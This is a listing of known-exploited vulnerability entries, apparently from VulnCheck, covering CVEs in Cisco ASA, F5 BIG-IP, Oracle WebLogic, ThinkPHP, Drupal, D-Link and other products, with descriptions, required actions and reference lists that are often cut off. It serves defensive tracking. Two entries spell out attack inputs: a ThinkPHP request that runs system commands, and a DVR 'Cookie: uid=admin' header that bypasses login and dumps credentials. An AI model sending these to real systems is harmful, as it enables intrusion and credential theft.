CVE-2020-3452 [HIGH] CWE-20 Cisco ASA and FTD Read-Only Path Traversal Vulnerability
Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an improper input validation vulnerability when HTTP requests process URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.
Affected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/
VulnCheck
Unraid Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-5847 [CRITICAL] Unraid Remote Code Execution Vulnerability
Unraid contains a vulnerability due to the insecure use of the extract PHP function that can be abused to execute remote code as root. This CVE is chainable with CVE-2020-5849 for initial access.
Affected: Unraid Unraid
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-01&host_type=src&vulnerability=cve-2020-5847; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2020-5847; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&
VulnCheck
74cms 74cms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-22211 [CRITICAL] 74cms 74cms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.
Affected: 74cms 74cms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-5902 [CRITICAL] CWE-22 F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution Vulnerability
F5 BIG-IP Traffic Management User Interface (TMUI) contains a remote code execution vulnerability in undisclosed pages.
Affected: F5 BIG-IP
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://redcanary.com/blog/kinsing-malware-citrix-saltstack/; https://cisa.gov/news-events/cybersecurity-advisories/aa20-206a; https://www.crowdstrike.com/blog/who-is-pioneer-kitten/; https://www.zdnet.com/article/iranian-hackers-are-selling-access-to-compromised-companies-on-an-underground-forum/; https://cisa.gov/news-events/cybersecurity-advisories/aa20-259a; https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a; https://www.esentire.com/se
VulnCheck
Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
vulncheck·2020·CVSS 8.8
CVE-2020-0618 [HIGH] CWE-502 Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Microsoft SQL Server Reporting Services contains a deserialization vulnerability because it handles page requests incorrectly. An authenticated attacker can exploit this vulnerability to execute code in the context of the Report Server service account.
Affected: Microsoft SQL Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-targetcompany; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://redalert.nshc.net/2024/07/26/the-activities-s
VulnCheck
Atlassian subversion_application_lifecycle_management Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2020·CVSS 6.1
CVE-2020-9344 [MEDIUM] Atlassian subversion_application_lifecycle_management Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.
Affected: Atlassian subversion_application_lifecycle_management
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
articatech web_proxy Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 8.8
CVE-2020-17505 [HIGH] articatech web_proxy Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
Affected: articatech web_proxy
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2020-17505; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vulnerability=cve-2020-17505;
VulnCheck
TerraMaster tos Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-28188 [CRITICAL] TerraMaster tos Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to inject OS commands via /include/makecvs.php in the Event parameter.
Affected: TerraMaster tos
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.checkpoint.com/2021/01/19/linux-users-should-patch-now-to-block-new-freakout-malware-which-exploits-new-vulnerabilities/; https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/; https://unit42.paloaltone
VulnCheck
articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-17506 [CRITICAL] articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Artica Web Proxy 4.30.00000000 allows a remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection in the apikey parameter of fw.login.php.
Affected: articatech web_proxy
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-01&host_type=src&vulnerability=cve-2020-17506; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2020-17506; https://dashboard.s
VulnCheck
PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
vulncheck·2020·CVSS 8.8
CVE-2020-24949 [HIGH] PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
Affected: php-fusion php-fusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2020-24949; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scan
VulnCheck
D-Link DNS-320 Device Command Injection Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-25506 [CRITICAL] CWE-78 D-Link DNS-320 Device Command Injection Vulnerability
D-Link DNS-320 device contains a command injection vulnerability in the sytem_mgr.cgi component that may allow for remote code execution.
Affected: D-Link DNS-320 Storage Device
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/; https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities; https://blog.netlab.360.com/new-ddos-botnet-wszeor/; https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-
VulnCheck
craftcms Craft CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-9757 [CRITICAL] craftcms Craft CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
Affected: craftcms Craft CMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Oracle WebLogic Server Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-14882 [CRITICAL] Oracle WebLogic Server Remote Code Execution Vulnerability
Oracle WebLogic Server contains an unspecified vulnerability, which is assessed to allow for remote code execution, based on this vulnerability being related to CVE-2020-14750.
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2020-14882; https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bo
VulnCheck
Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-15505 [CRITICAL] CWE-706 Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability
Ivanti MobileIron's Core & Connector, Sentry, and Monitor and Reporting Database (RDB) products contain an unspecified vulnerability that allows for remote code execution.
Affected: Ivanti MobileIron Multiple Products
Required Action: Apply updates per vendor instructions.
Exploitation References: https://cisa.gov/news-events/cybersecurity-advisories/aa20-275a; https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF; https://us-cert.cisa.gov/ncas/alerts/aa20-275a; https://cisa.gov/news-events/cybersecurity-advisories/aa20-283a; https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnera
VulnCheck
icewarp mail_server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2020·CVSS 6.1
CVE-2020-27982 [MEDIUM] icewarp mail_server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
IceWarp 11.4.5.0 allows XSS via the language parameter.
Affected: icewarp mail_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
BI Publisher Component of Oracle Fusion Middleware Unauthorized Update, Insert or Delete Vulnerability
vulncheck·2019·CVSS 7.2
CVE-2019-2767 [HIGH] BI Publisher Component of Oracle Fusion Middleware Unauthorized Update, Insert or Delete Vulnerability
Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). While the vulnerability is in BI Publisher (formerly XML Publisher), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of BI Publisher (formerly XML Publisher) accessible data as well as unauthorized read access to a su
VulnCheck
Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-18935 [CRITICAL] CWE-502 Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data Vulnerability
Progress Telerik UI for ASP.NET AJAX contains a deserialization of untrusted data vulnerability through RadAsyncUpload which leads to code execution on the server in the context of the w3wp.exe process.
Affected: Progress Telerik UI for ASP.NET AJAX
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://redcanary.com/blog/blue-mockingbird-cryptominer/; https://lifars.com/knowledge-center/xmrig-based-coinminer-bluemockingbird-group/; https://www.telerik.com/blogs/blue-mockingbird-vulnerability-telerik-guidance; https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html; https://www.hhs.gov/sites/default/files/netw
VulnCheck
wavemaker wavemarker_studio Server-Side Request Forgery (SSRF)
vulncheck·2019·CVSS 9.6
CVE-2019-8982 [CRITICAL] wavemaker wavemarker_studio Server-Side Request Forgery (SSRF)
com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF.
Affected: wavemaker wavemarker_studio
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
D-Link DNS-320 Remote Code Execution Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-16057 [CRITICAL] CWE-78 D-Link DNS-320 Remote Code Execution Vulnerability
The login_mgr.cgi script in D-Link DNS-320 is vulnerable to remote code execution.
Affected: D-Link DNS-320 Storage Device
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.securityweek.com/flaw-gives-hackers-remote-access-files-stored-d-link-dns-320-devices; https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://cybersecurityworks.com/howdymanage/uploads/file/ransomware-_-2022-spotlight-report_compressed.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.ivanti.com/resources/v/doc/pr-survey-report/ransomware-quarterly-indexreport_q2-q3; ht
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference
vulncheck·2019·CVSS 9.8
CVE-2019-9670 [CRITICAL] CWE-611 Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference
Synacor Zimbra Collaboration Suite (ZCS) contains an improper restriction of XML external entity (XXE) vulnerability in the mailboxd component.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF; https://www.tenable.com/blog/daisy-chaining-how-vulnerabilities-can-be-greater-than-the-sum-of-their-parts; https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF; https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf; htt
VulnCheck
Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-12988 [CRITICAL] Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 4 of 6).
Affected: Citrix SD-WAN and NetScaler
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-10-31&host_type=src&vulnerability=cve-2019-12988; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/
VulnCheck
ThinkPHP Remote Code Execution Vulnerability
vulncheck·2019·CVSS 8.8
CVE-2019-9082 [HIGH] CWE-306 ThinkPHP Remote Code Execution Vulnerability
ThinkPHP contains an unspecified vulnerability that allows for remote code execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.
Affected: ThinkPHP ThinkPHP
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://go.catonetworks.com/rs/245-RJK-441/images/Security%20Quarterly%20Report.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://decoded.avast.io/martinchlumecky/dirty
VulnCheck
Four-Faith f3x24_firmware Missing Authorization
vulncheck·2019·CVSS 7.2
CVE-2019-12168 [HIGH] Four-Faith f3x24_firmware Missing Authorization
Four-Faith Wireless Mobile Router F3x24 v1.0 devices allow remote code execution via the Command Shell (aka Administration > Commands) screen.
Affected: Four-Faith f3x24_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://info.greynoise.io/hubfs/resources/GreyNoise-How-Resurgent-Vulnerabilities-Jeopardize-Organizational-Security-Report.pdf; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2019-12168&date
VulnCheck
Oracle WebLogic Server, Injection
vulncheck·2019·CVSS 9.8
CVE-2019-2725 [CRITICAL] CWE-74 Oracle WebLogic Server, Injection
Injection vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html; https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/; https://digital.nhs.uk/cyber-alerts/2019/cc-3044; https://www.cyber.nj.gov/threat-center/threat-profiles/ransomware-variants/sodinokibi; https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/; https://blog.talosintelligence.com/2019/05/threat-source-may-9-19.html; https://unit42.paloalt
VulnCheck
Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
vulncheck·2019·CVSS 7.5
CVE-2019-1653 [HIGH] CWE-284 Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers contain improper access controls for URLs. Exploitation could allow an attacker to download the router configuration or detailed diagnostic information.
Affected: Cisco RV Series Routers
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.mandiant.com/resources/blog/apt41-initiates-global-intrusion-campaign-using-multiple-exploits; https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer; https://www.bleepingcomputer.com/news/security/us-charges-chinese-winnti-hackers-for-attacking-100-plus-companies/; https://cisa.gov/news-events/cybersec
VulnCheck
Oracle Fusion Middleware BI Publisher Unauthenticated Security Bypass
vulncheck·2019·CVSS 4.9
CVE-2019-2588 [MEDIUM] Oracle Fusion Middleware BI Publisher Unauthenticated Security Bypass
Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher (formerly XML Publisher) accessible data. CVSS 3.0 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).
Affected: Oracle BI Publisher
Required Action: Apply remediations or mitigation
VulnCheck
zeroshell zeroshell Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-12725 [CRITICAL] zeroshell zeroshell Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
Affected: zeroshell zeroshell
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html; https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr; https://hei
VulnCheck
Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-12987 [CRITICAL] Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 3 of 6).
Affected: Citrix SD-WAN and NetScaler
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-05&host_type=src&vulnerability=cve-2019-12987; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2019-12987; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability
VulnCheck
microstrategy microstrategy_web Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2018·CVSS 6.1
CVE-2018-18775 [MEDIUM] microstrategy microstrategy_web Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter. NOTE: this is a deprecated product.
Affected: microstrategy microstrategy_web
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning
VulnCheck
dedecms dedecms Cross-Site Request Forgery (CSRF)
vulncheck·2018·CVSS 8.8
CVE-2018-7700 [HIGH] dedecms dedecms Cross-Site Request Forgery (CSRF)
DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.
Affected: dedecms dedecms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2018-7700; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-17&host_type=src&vulnerability=cve-2018-7700; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-19&
VulnCheck
thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-16763 [CRITICAL] thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
Affected: thedaylightstudio Fuel CMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2018-16763; https://dashboard.sh
VulnCheck
jsmol2wp_project jsmol2wp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2018·CVSS 7.5
CVE-2018-20463 [HIGH] jsmol2wp_project jsmol2wp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.
Affected: jsmol2wp_project jsmol2wp
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continue
VulnCheck
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
vulncheck·2018·CVSS 9.1
CVE-2018-13379 [CRITICAL] CWE-22 Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Fortinet FortiOS SSL VPN web portal contains a path traversal vulnerability that may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.
Affected: Fortinet FortiOS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities; https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf; https://www.dragos.com/wp-content/uploads/The-ICS-Threat-Landscape.pdf; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-13379; https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF;
VulnCheck
tbkvision tbk-dvr4216_firmware Improper Authentication
vulncheck·2018·CVSS 9.8
CVE-2018-9995 [CRITICAL] tbkvision tbk-dvr4216_firmware Improper Authentication
TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
Affected: tbkvision tbk-dvr4216_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.csk.gov.in/alerts/STOP_ransomware.html; https://for
VulnCheck
Dasan GPON Routers Authentication Bypass Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-10561; https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.virusbulletin.com/virusbulletin/2019/12/vb2019-paper-absolutely-routed-why-routers-are-new-bul
VulnCheck
Drupal Core Remote Code Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-7600 [CRITICAL] CWE-20 Drupal Core Remote Code Execution Vulnerability
Drupal Core contains a remote code execution vulnerability that could allow an attacker to exploit multiple attack vectors on a Drupal site, resulting in complete site compromise.
Affected: Drupal Drupal Core
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/; https://cert.gov.ua/article/2725; https://blog.talosintelligence.com/2019/04/seaturtle.html; https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055; https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-jul
VulnCheck
Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
vulncheck·2018·CVSS 7.5
CVE-2018-0296 [HIGH] CWE-20 Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
Cisco Adaptive Security Appliance (ASA) contains an improper input validation vulnerability with HTTP URLs. Exploitation could allow an attacker to cause a denial-of-service (DoS) condition or information disclosure.
Affected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)
Required Action: Apply updates per vendor instructions.
